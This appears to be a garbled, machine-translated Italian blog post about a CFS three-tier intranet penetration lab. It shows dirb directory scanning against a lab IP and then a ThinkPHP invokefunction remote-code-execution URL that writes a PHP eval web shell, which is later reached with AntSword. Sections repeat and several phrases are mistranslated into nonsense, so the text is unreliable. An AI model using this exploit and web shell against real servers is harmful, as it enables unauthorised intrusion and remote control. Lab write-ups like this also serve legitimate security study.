Penetrazione intranet a tre livelli CFS - gestione della rete esterna (1)

Gestione rete esterna penetrazione intranet a tre livelli CFS (1)

2024-07-12

Sommario

Facciamolo esplodere prima per vedere se c'è un modo per attaccare.

Ho provato il percorso sospetto e ho scoperto che si trattava del framework thinkphp. Conoscevo anche la versione, quindi litighiamo il giorno successivo.

scrivere in php

Modifica e scrivi su PHP con successo, scaricalo semplicemente il giorno successivoModifica

Prova il collegamento della spada della formica

Gestito con successo

Gestione della rete esterna

Facciamolo esplodere prima per vedere se c'è un modo per attaccare.

Puoi provare dirsearch, dirb, gobuster e altri strumenti

dirb http://192.168.20.130/

Ho provato il percorso sospetto e ho scoperto che si trattava del framework thinkphp. Conoscevo anche la versione, quindi litighiamo il giorno successivo.

scrivere in php

http://192.168.20.130/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>

Scritto con successo in php, facile ottenerlo.

http://192.168.20.130/public/shell.php

Condivisione della tecnologia

Gestione rete esterna penetrazione intranet a tre livelli CFS (1)

Gestione della rete esterna

Facciamolo esplodere prima per vedere se c'è un modo per attaccare.

Ho provato il percorso sospetto e ho scoperto che si trattava del framework thinkphp. Conoscevo anche la versione, quindi litighiamo il giorno successivo.

scrivere in php

Scritto con successo in php, facile ottenerlo.

Prova il collegamento della spada della formica

Gestito con successo

Profilo personale

le mie informazioni di contatto